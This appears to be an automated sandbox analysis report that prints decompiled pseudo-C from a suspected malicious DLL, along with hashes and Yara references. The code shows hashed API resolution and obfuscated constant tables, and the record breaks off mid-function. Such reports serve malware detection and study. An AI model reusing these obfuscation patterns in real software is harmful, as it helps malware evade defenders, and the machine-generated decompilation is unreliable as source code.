Instruction ID: 165a2a15facf0f67e717b4f9d5008d178c22e96e1bf38a429652969f76f90cdf
Opcode Fuzzy Hash: 07d9c4833f1366b83be5177309f9aa39735453b2e90931b29ff6469b0ea7a879
Instruction Fuzzy Hash: D3F0E93416A2A1FFEE7099EAAC08D5E9698EF56655F000C39F284E5140D6B09C80E637

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E861494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6E861494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6E86F584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v76, E6E86F4CC( &_v76) + 0x10);
				E6E86F4BC( &_v80, E6E86F4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v84, E6E86F4CC(_t325) + 0x10);
				E6E86F4BC( &_v88, E6E86F4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v92, E6E86F4CC(_t329) + 0x10);
				E6E86F4BC( &_v96, E6E86F4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v100, E6E86F4CC(_t333) + 0x10);
				E6E86F4BC( &_v104, E6E86F4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v108, E6E86F4CC(_t337) + 0x10);
				E6E86F4BC( &_v112, E6E86F4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v116, E6E86F4CC(_t341) + 0x10);
				E6E86F4BC( &_v120, E6E86F4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v124, E6E86F4CC(_t345) + 0x10);
				E6E86F4BC( &_v128, E6E86F4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v132, E6E86F4CC(_t349) + 0x10);
				E6E86F4BC( &_v136, E6E86F4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v140, E6E86F4CC(_t353) + 0x10);
				E6E86F4BC( &_v144, E6E86F4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v148, E6E86F4CC(_t357) + 0x10);
				E6E86F4BC( &_v152, E6E86F4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v156, E6E86F4CC(_t361) + 0x10);
				E6E86F4BC( &_v160, E6E86F4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v164, E6E86F4CC(_t365) + 0x10);
				E6E86F4BC( &_v168, E6E86F4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v172, E6E86F4CC(_t369) + 0x10);
				E6E86F4BC( &_v176, E6E86F4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v180, E6E86F4CC(_t373) + 0x10);
				E6E86F4BC( &_v184, E6E86F4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v188, E6E86F4CC(_t377) + 0x10);
				E6E86F4BC( &_v192, E6E86F4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v196, E6E86F4CC(_t381) + 0x10);
				E6E86F4BC( &_v200, E6E86F4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v204, E6E86F4CC(_t385) + 0x10);
				E6E86F4BC( &_v208, E6E86F4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6E874200(0x60a28c5c, _t434);
				E6E86F4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6E86F4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6E86F4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6E86F4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6E86F4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6E86F4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6E86F4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6E86F4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6E86F4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6E86F4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6E86F4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6E86F4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6E86F4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6E86F4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6E86F4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6E86F4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6E86F4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6E861D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6E86B27C( &_v248, _v256, _t481, _v252, _t318);
				E6E86F840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v296, E6E86F4CC(_t410) + 0x10);
				E6E86F4BC( &_v300, E6E86F4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v304, E6E86F4CC(_t414) + 0x10);
				E6E86F4BC( &_v308, E6E86F4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v312, E6E86F4CC(_t418) + 0x10);
				E6E86F4BC( &_v316, E6E86F4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6E86F828( &_v320, E6E86F4CC(_t422) + 0x10);
				E6E86F4BC( &_v324, E6E86F4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6E86B9FC(_t154,  *_t480);
				E6E86F4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6E86F4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6E86F4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6E86F4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6E86F654( &_v316);
				return E6E86F654( &_v356);
			}

0x6e861494
0x6e861498
0x6e86149d
0x6e8614a3
0x6e8614ab
0x6e8614b0
0x6e8614bc
0x6e8614c0
0x6e8614d2
0x6e8614e8
0x6e8614f3
0x6e8614f4
0x6e8614f5
0x6e8614f6
0x6e8614f7
0x6e8614fa
0x6e8614fe
0x6e861502
0x6e861509
0x6e86151b
0x6e861531
0x6e86153c
0x6e86153d
0x6e86153e
0x6e86153f
0x6e861540
0x6e861543
0x6e861547
0x6e86154b
0x6e861552
0x6e861564
0x6e86157a
0x6e861585
0x6e861586
0x6e861587
0x6e861588
0x6e861589
0x6e86158c
0x6e861590
0x6e861594
0x6e86159b
0x6e8615ad
0x6e8615c3
0x6e8615ce
0x6e8615cf
0x6e8615d0
0x6e8615d1
0x6e8615d2
0x6e8615d5
0x6e8615d9
0x6e8615dd
0x6e8615e4
0x6e8615f6
0x6e86160c
0x6e861617
0x6e861618
0x6e861619
0x6e86161a
0x6e86161b
0x6e86161e
0x6e861622
0x6e861626
0x6e86162d
0x6e86163f
0x6e861655
0x6e861660
0x6e861661
0x6e861662
0x6e861663
0x6e861664
0x6e861667
0x6e86166b
0x6e86166f
0x6e861676
0x6e861688
0x6e86169e
0x6e8616a9
0x6e8616aa
0x6e8616ab
0x6e8616ac
0x6e8616ad
0x6e8616b0
0x6e8616b4
0x6e8616b8
0x6e8616bf
0x6e8616d1
0x6e8616e7
0x6e8616f2
0x6e8616f3
0x6e8616f4
0x6e8616f5
0x6e8616f6
0x6e8616f9
0x6e8616fd
0x6e861701
0x6e861708
0x6e86171a
0x6e861730
0x6e86173b
0x6e86173c
0x6e86173d
0x6e86173e
0x6e86173f
0x6e861742
0x6e861746
0x6e86174a
0x6e861751
0x6e861763
0x6e861779
0x6e861784
0x6e861785
0x6e861786
0x6e861787
0x6e861788
0x6e86178b
0x6e86178f
0x6e861793
0x6e86179a
0x6e8617ac
0x6e8617c2
0x6e8617cd
0x6e8617ce
0x6e8617cf
0x6e8617d0
0x6e8617d1
0x6e8617d4
0x6e8617d8
0x6e8617dc
0x6e8617e3
0x6e8617f5
0x6e86180b
0x6e861816
0x6e861817
0x6e861818
0x6e861819
0x6e86181a
0x6e86181d
0x6e861821
0x6e861825
0x6e86182c
0x6e86183e
0x6e861854
0x6e86185f
0x6e861860
0x6e861861
0x6e861862
0x6e861863
0x6e861866
0x6e86186a
0x6e86186e
0x6e861875
0x6e861887
0x6e86189d
0x6e8618a8
0x6e8618a9
0x6e8618aa
0x6e8618ab
0x6e8618ac
0x6e8618af
0x6e8618b3
0x6e8618b7
0x6e8618be
0x6e8618d0
0x6e8618e6
0x6e8618f1
0x6e8618f2
0x6e8618f3
0x6e8618f4
0x6e8618f5
0x6e8618f8
0x6e8618fc
0x6e861900
0x6e861907
0x6e861919
0x6e86192f
0x6e86193a
0x6e86193b
0x6e86193c
0x6e86193d
0x6e86193e
0x6e861941
0x6e861945
0x6e861949
0x6e861950
0x6e861962
0x6e861978
0x6e861983
0x6e861984
0x6e861985
0x6e861986
0x6e86198c
0x6e86198f
0x6e861991
0x6e86199c
0x6e8619a3
0x6e8619ac
0x6e8619b4
0x6e8619bb
0x6e8619c4
0x6e8619cc
0x6e8619d3
0x6e8619dc
0x6e8619e4
0x6e8619eb
0x6e8619f4
0x6e8619fc
0x6e861a03
0x6e861a0c
0x6e861a14
0x6e861a1b
0x6e861a24
0x6e861a2c
0x6e861a36
0x6e861a3f
0x6e861a47
0x6e861a51
0x6e861a5a
0x6e861a62
0x6e861a6c
0x6e861a75
0x6e861a7d
0x6e861a87
0x6e861a90
0x6e861a98
0x6e861aa2
0x6e861aab
0x6e861ab3
0x6e861abd
0x6e861ac6
0x6e861ace
0x6e861ad8
0x6e861ae1
0x6e861ae9
0x6e861af3
0x6e861afc
0x6e861b04
0x6e861b0e
0x6e861b17
0x6e861b1f
0x6e861b26
0x6e861b2f
0x6e861b37
0x6e861b3e
0x6e861b43
0x6e861b51
0x6e861b55
0x6e861b64
0x6e861b6d
0x6e861b72
0x6e861b79
0x6e861b7d
0x6e861b81
0x6e861b88
0x6e861b9a
0x6e861bb0
0x6e861bbb
0x6e861bbc
0x6e861bbd
0x6e861bbe
0x6e861bbf
0x6e861bc2
0x6e861bc6
0x6e861bca
0x6e861bd1
0x6e861be3
0x6e861bf9
0x6e861c04
0x6e861c05
0x6e861c06
0x6e861c07
0x6e861c08
0x6e861c0b
0x6e861c0f
0x6e861c13
0x6e861c1a
0x6e861c2c
0x6e861c42
0x6e861c4d
0x6e861c4e
0x6e861c4f
0x6e861c50
0x6e861c51
0x6e861c54
0x6e861c58
0x6e861c5c
0x6e861c63
0x6e861c75
0x6e861c8b
0x6e861c96
0x6e861c97
0x6e861c98
0x6e861c99
0x6e861c9a
0x6e861c9d
0x6e861ca0
0x6e861ca1
0x6e861ca2
0x6e861ca9
0x6e861cac
0x6e861cb7
0x6e861cbe
0x6e861cc7
0x6e861ccf
0x6e861cd6
0x6e861cdf
0x6e861ce7
0x6e861cee
0x6e861cf7
0x6e861cff
0x6e861d04
0x6e861d0d
0x6e861d15
0x6e861d2a

Strings

8nsK, xrefs: 6E861900

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 0169b8ceb924bd624878aa4738d3681c76bd49814fd1019c6749b6d78cbf519c
Instruction ID: 3fc42481755c83d1e9335526911012e3030d016a3a99b89371365731a4ef5dab
Opcode Fuzzy Hash: 0169b8ceb924bd624878aa4738d3681c76bd49814fd1019c6749b6d78cbf519c
Instruction Fuzzy Hash: C532F6724047069BC715DF64CD51AEFB7A4EFB1208F204F0DB5896A1A2FF71E98AC681

Uniqueness

Uniqueness Score: -1.00%

Function 6E86A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6E86A4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6E86B658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6E86F4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6E86F654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6E872234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6E86F654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6E86F584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6E86F584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6e87b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6E873064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6E86F4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6E86F4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6E86B5C4(_t439 + 0x34);
											E6E86B5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6E86B5C4(_t439 + 0x34);
										E6E86B5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6E86F4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6E86CA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6E86C280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6E86F828(_t439 + 0x14, E6E86F4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6E86F4BC(_t439 + 0x14, E6E86F4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6E873064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6E86F828(_t439 + 0x40, E6E86F4CC(_t439 + 0x3c) + 4);
											 *(E6E86F4BC(_t439 + 0x40, E6E86F4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6E86CD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6E86F4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6E86F4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6E86AC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6E86CD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6E86F4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6E86F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6E86F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6E86F4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6E86F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6E8738F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E86F4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6E86F828( *((intOrPtr*)(_t439 + 8)), E6E86F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6E86F4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6E86F4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6E86F4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6E86F4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6E8738F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E86F4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6E86F828( *((intOrPtr*)(_t439 + 4)), E6E86F4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6E86F828( *((intOrPtr*)(_t439 + 8)), E6E86F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6E86F4BC( *((intOrPtr*)(_t439 + 8)), E6E86F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6E86F828( *((intOrPtr*)(_t439 + 4)), E6E86F4CC( *_t439) + 4);
								 *(E6E86F4BC( *((intOrPtr*)(_t439 + 4)), E6E86F4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
